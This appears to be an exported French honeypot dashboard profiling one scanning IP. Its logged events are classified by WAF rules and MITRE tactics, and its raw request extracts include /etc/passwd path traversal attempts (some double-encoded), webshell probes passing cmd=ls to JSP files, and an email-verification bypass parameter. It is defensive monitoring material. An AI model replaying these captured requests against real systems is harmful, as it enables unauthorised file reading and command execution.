Profil de menace
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 70 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Période analysée : 2026-07-02 → 2026-08-01
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 70 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Activité suspecte — risque 51/100 (Moyen) — MITRE TA0001 — confiance 70 % — via HTTP — multi-protocole (2 protocoles · 5 min)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Tentative d'exploit (tag rce-0) · confiance 62%
Confiance 70 % — Score WAF 80 · Bonus corrélation +8 · 3 tag(s) WAF
ASN 45102 · 8.216.0.0/17 · APNIC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 5,272 événements sur la période pour cette IP.
Même FAI Alibaba (US) Technology Co., Ltd. — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
5,272 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
5272 événement(s) — page 1/106
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0;
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0;
Requête brute (extrait)
GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) | Élevée | Moyen · 51 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
18
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 51
Confiance : Confiance 62 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel
Requête brute (extrait)
GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Acce |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /my-account/ | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /my-account/ UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
21
Recommandation
Investiguer
Tags
Cible HTTP
GET
/my-account/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/my-account/
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 55
Confiance : Confiance 62 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macin
Requête brute (extrait)
GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: */* Accept-La |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macin
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macin
Requête brute (extrait)
GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 Accept: */* Accept-Languag |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /index.php/apps/app_api/proxy/flow/api/w/_/jobs… | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F… UA Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.8
Émulateur
HTTP
WAF
43
Recommandation
Investiguer
Tags
Cible HTTP
GET
/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 65
Confiance : Confiance 100 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.8
Règles WAF
lfi-0
lfi-1
lfi-14
rce-0
nosqli-3
Payload (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1
Requête brute (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.8 Accept: */* Accept-Langua |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1
Requête brute (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Accep |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%252
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%252
Requête brute (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefo |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde SAP ICM HTTP Sonde SAP ICM / WebDynpro · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 34 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /irj/cache.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML
Pourquoi cette classification : Type « sap_web_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 34
Confiance : Confiance 0 % — 7 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /irj/cache.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML
Requête brute (extrait)
GET /irj/cache.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /index.php/apps/app_api/proxy/flow/api/w/_/jobs… | Élevée | Élevé · 65 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605…
Émulateur
HTTP
WAF
43
Recommandation
Investiguer
Tags
Cible HTTP
GET
/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 65
Confiance : Confiance 100 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15
Règles WAF
lfi-0
lfi-1
lfi-14
rce-0
nosqli-3
Payload (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%252
Requête brute (extrait)
GET /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHT |
|||||||
| TCP | 7001 · HTTP | http | Upload webshell webshell upload · via HTTP:7001 · (tentative d'exploit) · → /irj/cache.jsp | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /irj/cache.jsp UA Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (K…
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/irj/cache.jsp
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/irj/cache.jsp
Service
HTTP
Pourquoi cette classification : Règle WAF « webshell-param-cmd » · Paramètres de scan · confiance 50%
Confiance classification
58%
Corrélation +8
Risque capteur
Moyen
· 64
Confiance : Confiance 50 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Règles WAF
rce-0
nosqli-3
webshell-param-cmd
Payload (extrait)
GET /irj/cache.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537
Requête brute (extrait)
GET /irj/cache.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Upload webshell webshell upload · via HTTP:7001 · (tentative d'exploit) · → /irj/helper.jsp | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /irj/helper.jsp UA Mozilla/5.0 (Macintosh; Intel Mac OS X 108) AppleWebKit/536.15 …
Émulateur
HTTP
WAF
25
Recommandation
Investiguer
Tags
Cible HTTP
GET
/irj/helper.jsp
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/irj/helper.jsp
Service
HTTP
Pourquoi cette classification : Règle WAF « webshell-param-cmd » · Paramètres de scan · confiance 50%
Confiance classification
58%
Corrélation +8
Risque capteur
Moyen
· 64
Confiance : Confiance 50 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 108) AppleWebKit/536.15 (KHTML like Gecko) Version/6.0 Safari/536.16
Règles WAF
rce-0
nosqli-3
webshell-param-cmd
Payload (extrait)
GET /irj/helper.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 108) AppleWebKit/
Requête brute (extrait)
GET /irj/helper.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 108) AppleWebKit/536.15 (KHTML like Gecko) Version/6.0 Safari/536.16 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde SAP ICM HTTP Sonde SAP ICM / WebDynpro · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 34 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /irj/helper.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTM
Pourquoi cette classification : Type « sap_web_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 34
Confiance : Confiance 0 % — 7 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /irj/helper.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTM
Requête brute (extrait)
GET /irj/helper.jsp?cmd=ls HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Maci
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Maci
Requête brute (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1 Accept: */* |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%… | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/2…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
CRS-930100-sub
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
Règles WAF
lfi-0
lfi-1
lfi-14
rce-0
nosqli-3
k8s-api
Payload (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Maci
Requête brute (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla
Requête brute (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: */* Accept-Language: |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%… | Élevée | Élevé · 66 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Élevé
· 66
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
CRS-930100-sub
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15
Règles WAF
lfi-0
lfi-1
lfi-14
rce-0
nosqli-3
k8s-api
Payload (extrait)
GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla
Requête brute (extrait)
